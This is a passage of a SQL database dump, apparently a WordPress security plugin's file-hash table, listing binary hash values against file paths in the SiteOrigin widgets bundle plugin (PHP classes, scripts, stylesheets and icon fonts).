};G9%','',0,'?'),('*ɝ|9ñC?}','wp-content/plugins/so-widgets-bundle/base/inc/lib/Less/Tree/DefaultFunc.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':ֶwF6','2utsn&F-Xݖ3h~@D','',0,'?'),('3kq>]֑kl*','wp-content/plugins/so-widgets-bundle/base/inc/lib/Less/Tree/DetachedRuleset.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Q\Zs3TU۶','t{dц4}}	xsnˈV','',0,'?'),('aȮaCfj[\r\"','wp-content/plugins/so-widgets-bundle/base/inc/lib/Less/Tree/Dimension.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\Za\';e!','!$<>XRG1ՋEcoS@','',0,'?'),('*/\"{P4','wp-content/plugins/so-widgets-bundle/base/inc/lib/Less/Tree/Directive.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','/#j^`BM','\\\"bd^\nrq\Zar$','',0,'?'),('/V2E','wp-content/plugins/so-widgets-bundle/base/inc/lib/Less/Tree/Element.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','K24\ZHГ','c\\yw\'Ĥ|xp8g*','',0,'?'),('w..#x-\'','wp-content/plugins/so-widgets-bundle/base/inc/lib/Less/Tree/Expression.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',9{Ë[','M/\"U,1bGC.b\0[Z','',0,'?'),('h#~b%','wp-content/plugins/so-widgets-bundle/base/inc/lib/Less/Tree/Extend.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','<N\0ZZ','|WE:1`Vos9G\r','',0,'?'),('}kT*Lp','wp-content/plugins/so-widgets-bundle/base/inc/lib/Less/Tree/Import.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','`BgK_r','EdjY̘Am@n6z<(a','',0,'?'),('dӥʆDu̾_J','wp-content/plugins/so-widgets-bundle/base/inc/lib/Less/Tree/Javascript.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','&u\n8䟍ؾS','ỤǝX)M}t?EU4\"[s','',0,'?'),('3TW<\"PxƆ','wp-content/plugins/so-widgets-bundle/base/inc/lib/Less/Tree/Keyword.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','.Ϋ		7\n&K','aZ׋ep9K佛f3!҃','',0,'?'),('3FAtv','wp-content/plugins/so-widgets-bundle/base/inc/lib/Less/Tree/Media.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\nD+H:pnm','KDtR(a;9.x8mf6','',0,'?'),('VZѵDR\"o%','wp-content/plugins/so-widgets-bundle/base/inc/lib/Less/Tree/Mixin/Call.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','mXq^n','0eO ZPC\r17rN\n)Ur0','',0,'?'),('?Hwu','wp-content/plugins/so-widgets-bundle/base/inc/lib/Less/Tree/Mixin/Definition.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\riJgl/0s(',',UzrgF6P^Q','',0,'?'),('ؿk[Ůc','wp-content/plugins/so-widgets-bundle/base/inc/lib/Less/Tree/NameValue.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','HDuȈIMA','Ymx.N$u ','',0,'?'),('/Ix1vDX','wp-content/plugins/so-widgets-bundle/base/inc/lib/Less/Tree/Negative.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',')+f;el2','zuvS@?Q\0*+','',0,'?'),('*])i\nxGLW','wp-content/plugins/so-widgets-bundle/base/inc/lib/Less/Tree/Operation.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','HC','G9E\0<M\rİ1*˶\\ʓU','',0,'?'),('Nф6?y','wp-content/plugins/so-widgets-bundle/base/inc/lib/Less/Tree/Paren.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','|͵29l\"','I7j~MAi#>KjB','',0,'?'),('5u	>4x2','wp-content/plugins/so-widgets-bundle/base/inc/lib/Less/Tree/Quoted.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','xERR@熺6','`aHkM{c,P?517ԍ/}Jr','',0,'?'),('r|ǨF(X!{$F','wp-content/plugins/so-widgets-bundle/base/inc/lib/Less/Tree/Rule.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','8%;g\\ƢH','֋d H0:\0pwܷWe(Q','',0,'?'),('O,[E7,X	~','wp-content/plugins/so-widgets-bundle/base/inc/lib/Less/Tree/Ruleset.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Eow\rv^)H\n\"','tBTRH ꭬P)@?DN[ ?','',0,'?'),('8(,/	J','wp-content/plugins/so-widgets-bundle/base/inc/lib/Less/Tree/RulesetCall.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','DAN<\ZvY','Rώ/tn(\\m)BhʋGL','',0,'?'),('vIIJX)f','wp-content/plugins/so-widgets-bundle/base/inc/lib/Less/Tree/Selector.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ˤ2cFFqaBk6','ZK3zzwq立u	>ӂqUL.E','',0,'?'),('k-<r;','wp-content/plugins/so-widgets-bundle/base/inc/lib/Less/Tree/UnicodeDescriptor.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','`M_@7q}{>y','Cn>P#Z=ު=R~oG*','',0,'?'),('R5sMgw93','wp-content/plugins/so-widgets-bundle/base/inc/lib/Less/Tree/Unit.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','?{m^S','ӟPDXsaD5?','',0,'?'),('zu1Wj','wp-content/plugins/so-widgets-bundle/base/inc/lib/Less/Tree/UnitConversions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','va9.XȖ','pN4>(~&\n\r5;J6Re+','',0,'?'),(';iK3','wp-content/plugins/so-widgets-bundle/base/inc/lib/Less/Tree/Url.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','&2X>m\"Q\n','R%IE{l=SnO,(p','',0,'?'),('BuҼ9N~9','wp-content/plugins/so-widgets-bundle/base/inc/lib/Less/Tree/Value.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','V\0|Hnp','g@PeD:,ۄ\'[I+nx/6S','',0,'?'),('8SA\'Y<҂5','wp-content/plugins/so-widgets-bundle/base/inc/lib/Less/Tree/Variable.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1m	f','!19?57GφpE\0\'.I7&','',0,'?'),('0;IH>$QFFj','wp-content/plugins/so-widgets-bundle/base/inc/lib/Less/Tree.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','y9eIR','{\':I\rgJ9yS[$ᦃ[','',0,'?'),('yqi|&h2\"ؑ','wp-content/plugins/so-widgets-bundle/base/inc/lib/Less/Version.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9LcQCU','0UiˡLm^`1a','',0,'?'),('[(=(A|','wp-content/plugins/so-widgets-bundle/base/inc/lib/Less/Visitor/extendFinder.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ӿ*f\ZFޔ89','0 C&nv~DviR}l','',0,'?'),('\"˒[C0ZA','wp-content/plugins/so-widgets-bundle/base/inc/lib/Less/Visitor/import.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ҷcbǉ\Z','a4ɲ;suQ!o<oغg8','',0,'?'),('rbSr4\"W@\r*','wp-content/plugins/so-widgets-bundle/base/inc/lib/Less/Visitor/joinSelector.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','.\0Ζu\0K \0e',',PFɣ~#Oh}1LnV.w^!AU','',0,'?'),('C+(uz?\"','wp-content/plugins/so-widgets-bundle/base/inc/lib/Less/Visitor/processExtends.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','vu=\0i/X(E','\02!Hm8eŽy]\Z','',0,'?'),('\0 m|&\"92','wp-content/plugins/so-widgets-bundle/base/inc/lib/Less/Visitor/toCSS.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','O}^7Z\'ʠ-','\0<\07@`dbvK.nr','',0,'?'),('PU\'k}','wp-content/plugins/so-widgets-bundle/base/inc/lib/Less/Visitor.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','{Q,CyO5M','3o&p3hj:ؐ.9z(\Zt}C','',0,'?'),('Rq0PsN×k>qEl+','wp-content/plugins/so-widgets-bundle/base/inc/lib/Less/VisitorReplacing.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','s{\0IX','br3D-r\rr\ZPg','',0,'?'),('%SZ7~uU6[','wp-content/plugins/so-widgets-bundle/base/inc/meta-box-manager.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ULY2','h#\n\'EOW5Ѝd(|KQ','',0,'?'),('ҳ%fOګ','wp-content/plugins/so-widgets-bundle/base/inc/post-selector.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','l{qc(','3q;/l|߫CN7j\0m','',0,'?'),('9o\rC	۠','wp-content/plugins/so-widgets-bundle/base/inc/routes/siteorigin-widgets-resource.class.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=R+OlZ&֡G-',':7(\rM7<JUVD0jw@8]O','',0,'?'),('}@uHqVn','wp-content/plugins/so-widgets-bundle/base/inc/routes/sowb-rest-routes.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','$0we ,]pӮЋ','{$/-%샵.X\0Lp5UkY|jYG8','',0,'?'),('[ P;?PH!y1','wp-content/plugins/so-widgets-bundle/base/inc/shortcode.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','zk+eО','wu3\r	Vg0fS','',0,'?'),('\n.ϭ4}o','wp-content/plugins/so-widgets-bundle/base/inc/string-utils.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','A\"07>k','joއ­\'x\\\0K{mK','',0,'?'),('=ZGgvL','wp-content/plugins/so-widgets-bundle/base/inc/video.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','%Kt\n','yPZ0d,.\rSC %k','',0,'?'),('Veބkm','wp-content/plugins/so-widgets-bundle/base/inc/widget-manager.class.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','.ۘ#G+*','{FdN%\Z)uːs5<wB1','',0,'?'),(']^O9u2_','wp-content/plugins/so-widgets-bundle/base/inc/widgets/base-slider.class.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','M.O%U z@O','jc? )3sH.~W=S','',0,'?'),(' ~iJ%]w?','wp-content/plugins/so-widgets-bundle/base/js/admin.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','qʸf','2la[:\0d#`!','',0,'?'),('SC$(9\n\"@','wp-content/plugins/so-widgets-bundle/base/js/admin.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Pz`}pĸ','QF+nvsR>OD^\'$&V/z','',0,'?'),('\r_M,Fjv','wp-content/plugins/so-widgets-bundle/base/js/meta-box-manager.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','!=Ī<i\Z','ra#OoSK\0T-(Tx','',0,'?'),('qV`j@soRX','wp-content/plugins/so-widgets-bundle/base/js/meta-box-manager.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','!,\r.\0<b$','\n%NIC7z$M{D,sїw','',0,'?'),('Sjx=a','wp-content/plugins/so-widgets-bundle/base/less/lesshat.less',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','/PnI!5F;','@$kT<B쉓^bYp10','',0,'?'),('Ad54>R','wp-content/plugins/so-widgets-bundle/base/less/mixins.less',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ZSkp/','|*emA͚AQwU~','',0,'?'),('ǷN-C','wp-content/plugins/so-widgets-bundle/base/siteorigin-widget.class.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','A\\?1Ʃ','Dw_JyꦆE$B,IG_AWw','',0,'?'),('\'KNhlK+','wp-content/plugins/so-widgets-bundle/compat/beaver-builder/beaver-builder.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','4	%@\ZjK9\\','\07YYR\0ߵZO</:.','',0,'?'),('٩V)v^','wp-content/plugins/so-widgets-bundle/compat/beaver-builder/sowb-beaver-builder.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','DR-i+ P-Bd','qAP5sDt\'SÑUmQ-','',0,'?'),('bJ;(','wp-content/plugins/so-widgets-bundle/compat/beaver-builder/sowb-beaver-builder.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';RGV,X2P^','-śm\rq!9+9Y?D','',0,'?'),('.379,qeE','wp-content/plugins/so-widgets-bundle/compat/beaver-builder/styles.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','kܜpGp>','T!XЦ0S*e$;D\'`:','',0,'?'),('r\Z.	v','wp-content/plugins/so-widgets-bundle/compat/block-editor/widget-block.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','X\n.$C[','KGM(g8=(̗k:-ɀW','',0,'?'),('G,qj~l\'','wp-content/plugins/so-widgets-bundle/compat/block-editor/widget-block.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','k=ȴ}0t','Canm.C+R(|	$3~u2d[~','',0,'?'),('+EŲ,','wp-content/plugins/so-widgets-bundle/compat/block-editor/widget-block.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1gtka[EH','ś@N.8TB|KrƥMqXqLn','',0,'?'),(')b$tREdIQ','wp-content/plugins/so-widgets-bundle/compat/builders.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ǀNbO','X[8h8jQѶqѭ^(4wܵ','',0,'?'),('= _rÕF\'','wp-content/plugins/so-widgets-bundle/compat/compat.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','C\" q/','d#2WiLǘ ~w\Z<r7&6>/\\','',0,'?'),('Ѹ虯%4/','wp-content/plugins/so-widgets-bundle/compat/elementor/elementor.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','UE*%w˒z','$!OvG?g_.Yݖf(+\n','',0,'?'),('y\\TcAyI','wp-content/plugins/so-widgets-bundle/compat/elementor/sowb-elementor.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','%2{i\\exR','Zoc\"6P!RSּ kX-','',0,'?'),('D\Zr<=w]f','wp-content/plugins/so-widgets-bundle/compat/elementor/sowb-elementor.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','^⒯M?ou0?','o(U< }wެae','',0,'?'),('5O{K\Z','wp-content/plugins/so-widgets-bundle/compat/elementor/styles.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','RFPK=K6>g','mKi/-	-MI\r&0$3½l9','',0,'?'),('-ZQ|6H','wp-content/plugins/so-widgets-bundle/compat/visual-composer/front_enqueue_js.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','~סwt/\0','8ꬃ4LniZmh\"|^V櫯','',0,'?'),('O_ߴpo','wp-content/plugins/so-widgets-bundle/compat/visual-composer/front_enqueue_js.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',瞫yj','wx{RHm=wN/I%aJq','',0,'?'),('DxC=Sa','wp-content/plugins/so-widgets-bundle/compat/visual-composer/siteorigin_widget_vc_template.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','@ُ߀<av[f)','4N8|:HF=\rg]','',0,'?'),('38~҃*\rKr','wp-content/plugins/so-widgets-bundle/compat/visual-composer/sowb-vc-widget.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',']&a)6l','EMOvoǞ	0+s5΂ؐG`','',0,'?'),('Dfk\\2QAݕ','wp-content/plugins/so-widgets-bundle/compat/visual-composer/sowb-vc-widget.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','%tr6$G','G*|a_s*\"	kz1gLÍ','',0,'?'),('i\"w!nU','wp-content/plugins/so-widgets-bundle/compat/visual-composer/styles.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ڎIwp','6J̵\"$\r缾A','',0,'?'),('=ɽjayqK^','wp-content/plugins/so-widgets-bundle/compat/visual-composer/visual-composer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':+ߴEL  Z ',']o!V)*)+,mڐY:','',0,'?'),('F5y8Mj>J=b','wp-content/plugins/so-widgets-bundle/css/lib/slick.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','YF83zoR	E','dbG%!?.\0hy7F?VIp','',0,'?'),('c7q`*','wp-content/plugins/so-widgets-bundle/css/slider/fonts/slider.eot',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Yn\05SSQ1','yGϘ߇kחWmTS>XLK\n8','',0,'?'),('t*s\n1J','wp-content/plugins/so-widgets-bundle/css/slider/fonts/slider.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3E}.\r','!+X	tNm)sY9-d','',0,'?'),('u~SvsÅ','wp-content/plugins/so-widgets-bundle/css/slider/fonts/slider.ttf',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','_<3F?\\G','E\'\Z <!Lx-[:ILfą','',0,'?'),('E5*G#x\'*','wp-content/plugins/so-widgets-bundle/css/slider/fonts/slider.woff',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','xDLc%','\0c+JZ[CnD[l\0b','',0,'?'),('onBX\\','wp-content/plugins/so-widgets-bundle/css/slider/slider.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','dyKbh}','3rFM.;vVa\0mĀW;B-P','',0,'?'),('@[@埉{:2L\\F','wp-content/plugins/so-widgets-bundle/icons/elegantline/filter.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','YF?$GB1','^]r7^mo2YBbFi','',0,'?'),('0}we*SE','wp-content/plugins/so-widgets-bundle/icons/elegantline/font/elegantline.eot',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','+~3\r%oul','+fEj2ifXgmt\\~]U','',0,'?'),('~?mU\rn ','wp-content/plugins/so-widgets-bundle/icons/elegantline/font/elegantline.ttf',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','XS}{','Yh1>^]U,knE\'x','',0,'?'),('lҠUT','wp-content/plugins/so-widgets-bundle/icons/elegantline/font/elegantline.woff',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ĪիSAʛ8','Fh\"_8\n4F2ee','',0,'?'),('ߎ\",*)9h','wp-content/plugins/so-widgets-bundle/icons/elegantline/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','5','&T^r5qn8/','',0,'?'),('72x5txV','wp-content/plugins/so-widgets-bundle/icons/fontawesome/filter.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','V8:TV','\n~\r܃/T*긘','',0,'?'),('5GfMGpws','wp-content/plugins/so-widgets-bundle/icons/fontawesome/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(4oL\Zf0Ё','F\r]̧LAC{U\'~6}Y]\0&','',0,'?'),('<khvҥy','wp-content/plugins/so-widgets-bundle/icons/fontawesome/webfonts/fa-brands-400.eot',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','I(A0yEōT',',!?./|\"66Wr2q\reYH','',0,'?'),('\'unU\"მ','wp-content/plugins/so-widgets-bundle/icons/fontawesome/webfonts/fa-brands-400.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','8SC)nsl]','&\n㠸Xg&T=áh','',0,'?'),('Q%8y8DK','wp-content/plugins/so-widgets-bundle/icons/fontawesome/webfonts/fa-brands-400.ttf',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','q pb$#','^@gjkD rG.`s\"\Z3P','',0,'?'),('hIԾZJ{e','wp-content/plugins/so-widgets-bundle/icons/fontawesome/webfonts/fa-brands-400.woff',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','%VC|&0\Z','.0w ΁FE|h\n\npDr','',0,'?'),(']4McuZ','wp-content/plugins/so-widgets-bundle/icons/fontawesome/webfonts/fa-brands-400.woff2',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','LhHO','	>QK@,[qCEA','',0,'?'),('SբJW]','wp-content/plugins/so-widgets-bundle/icons/fontawesome/webfonts/fa-regular-400.eot',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','8xq','n7OP6s#vb}hCźS','',0,'?'),('%\0NE&HFF','wp-content/plugins/so-widgets-bundle/icons/fontawesome/webfonts/fa-regular-400.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ڊ#[N!P:;','R	tL+MR3$.ug	c','',0,'?'),('W(}XMHftȇ6','wp-content/plugins/so-widgets-bundle/icons/fontawesome/webfonts/fa-regular-400.ttf',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3BQo|Fֶ{','e0EZoaB5Y[Z:>\"','',0,'?'),('t-鄱','wp-content/plugins/so-widgets-bundle/icons/fontawesome/webfonts/fa-regular-400.woff',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','zVu3S_6','\"*׶A,jQ:#ƖL6','',0,'?'),('O^Cۙ5ݞ Ie','wp-content/plugins/so-widgets-bundle/icons/fontawesome/webfonts/fa-regular-400.woff2',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','y6%f]-Dx<','l^v8:\"XݲU\"wi','',0,'?'),('y%B\'L','wp-content/plugins/so-widgets-bundle/icons/fontawesome/webfonts/fa-solid-900.eot',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','gZakhFbUL','=O :PyKk{o%1','',0,'?'),('RSAC','wp-content/plugins/so-widgets-bundle/icons/fontawesome/webfonts/fa-solid-900.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','w&6x','dpc鳞C1[(NɨQѪp{[kywj','',0,'?'),('_?zQ8WV','wp-content/plugins/so-widgets-bundle/icons/fontawesome/webfonts/fa-solid-900.ttf',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','L;/!8޻֭-','Oc9a+-tTm\rX(\"mEv@','',0,'?'),(';GĽVftg','wp-content/plugins/so-widgets-bundle/icons/fontawesome/webfonts/fa-solid-900.woff',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ju[.#','\rD6,0vns|','',0,'?'),('?)98','wp-content/plugins/so-widgets-bundle/icons/fontawesome/webfonts/fa-solid-900.woff2',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','dl\'Zys','*J	o(_	-0#n\0wR','',0,'?'),('p]$3\0;','wp-content/plugins/so-widgets-bundle/icons/genericons/filter.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-9o큩B\\U','l/\\\'(eJ}6ɉk^5>','',0,'?'),('7p:rZ\rKd͸','wp-content/plugins/so-widgets-bundle/icons/genericons/font/genericons.eot',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','r98ez`','z\"1\Zq6O4&t.smeL','',0,'?'),('}fiҸQȂ','wp-content/plugins/so-widgets-bundle/icons/genericons/font/genericons.ttf',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','?\' K>','Iiw-ƹ7_K	A/qD]i؜','',0,'?'),('[BEOۓ	Zk','wp-content/plugins/so-widgets-bundle/icons/genericons/font/genericons.woff',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','zgÅm~v',']6p@DUS	YBN6Ҁq','',0,'?'),('fJqu$9Uz','wp-content/plugins/so-widgets-bundle/icons/genericons/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','r\np]','\"G4?ꢈ=Vi-Z5`[rRq','',0,'?'),('Rd\"#oA','wp-content/plugins/so-widgets-bundle/icons/icomoon/filter.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','98Ƹ|','p \Z@XhX31Pǰ0B\n','',0,'?'),('eۯ-t|P4','wp-content/plugins/so-widgets-bundle/icons/icomoon/font/icomoon.eot',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','03K!/huU|','Ө\0T$\n.Ma)','',0,'?'),('qd4|-7/tO','wp-content/plugins/so-widgets-bundle/icons/icomoon/font/icomoon.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','pGVzP',';.nb4C,\"sƐYK[`K','',0,'?'),('qoR\"H ,GE_F','wp-content/plugins/so-widgets-bundle/icons/icomoon/font/icomoon.ttf',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','K`[@b+C','L\r{n\"/+KM\n\"~iE','',0,'?'),('_=bau	ѝH.','wp-content/plugins/so-widgets-bundle/icons/icomoon/font/icomoon.woff',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','vp<E˟','+-b=AlY\nT|lعyYQPO','',0,'?'),('4U,B[R ','wp-content/plugins/so-widgets-bundle/icons/icomoon/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','#n9NO','ގ\'rco@B9\'6:','',0,'?'),('7{9.z.&\']','wp-content/plugins/so-widgets-bundle/icons/icons.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(,ɝa&t<!H','2\n6肪vBs6Eb9\Z','',0,'?'),('bjxl\'M\\8','wp-content/plugins/so-widgets-bundle/icons/ionicons/filter.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','pމ%Pckح1','u54yC%jA fwDyۻ','',0,'?'),('j$Di_6M','wp-content/plugins/so-widgets-bundle/icons/ionicons/font/ionicons.eot',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',*h;\n[YP','z{\"	GUldu<}1v.','',0,'?'),('^4h\'Zq','wp-content/plugins/so-widgets-bundle/icons/ionicons/font/ionicons.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','bӆt<',':ݺ],\\\\L6Hp;Ph7LS','',0,'?'),('nB.R\\h^R','wp-content/plugins/so-widgets-bundle/icons/ionicons/font/ionicons.ttf',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','$q/lG/Rò','(2UC,zfꙅX_z_','',0,'?'),('0r_P:;`j','wp-content/plugins/so-widgets-bundle/icons/ionicons/font/ionicons.woff',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','hI15[I]J','*\\&t䭨\\	gTw,1','',0,'?'),(';rf\Z\Z','wp-content/plugins/so-widgets-bundle/icons/ionicons/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ЃGf8DSFRi','}<p!KD4b5*E޹','',0,'?'),('B[DG^yİ2\0','wp-content/plugins/so-widgets-bundle/icons/licenses.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','IܟH=','2Min\nJa61k^xsK3','',0,'?'),('0\ZIbfQ','wp-content/plugins/so-widgets-bundle/icons/typicons/filter.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':*huJ`8yH','E\Z<C6G+|v,u?5?qL','',0,'?'),('3wno(	kz:','wp-content/plugins/so-widgets-bundle/icons/typicons/font/typicons.eot',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2Jjz}/G[+	','r!. nJ:|oB*@V','',0,'?'),(',]56Z֌','wp-content/plugins/so-widgets-bundle/icons/typicons/font/typicons.ttf',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','%V(3s','GQ73\'xj.{.3\'x7','',0,'?'),('RQzk?y','wp-content/plugins/so-widgets-bundle/icons/typicons/font/typicons.woff',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','f<Ҹi^Z@?','[%1-&S͕dp`nSs','',0,'?'),('nz6K;n','wp-content/plugins/so-widgets-bundle/icons/typicons/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','j!56V74wy','lӾLשZ1sHݹ/=','',0,'?'),('H5|bc\rǐPm','wp-content/plugins/so-widgets-bundle/js/jquery.cycle.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','$F=y:a1Ё','l4`*|t\09JX7','',0,'?'),('5h(+A>N<<','wp-content/plugins/so-widgets-bundle/js/jquery.cycle.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','A<dǼ/+',')=P0h;_.%O,be','',0,'?'),(')ɻ*ЉiԠ','wp-content/plugins/so-widgets-bundle/js/jquery.cycle.swipe.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':3`C','L)J3	bﳲq\'XonB\'6>','',0,'?'),('}Ch6if','wp-content/plugins/so-widgets-bundle/js/jquery.cycle.swipe.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','tCʼM$P,7~A','w9{FK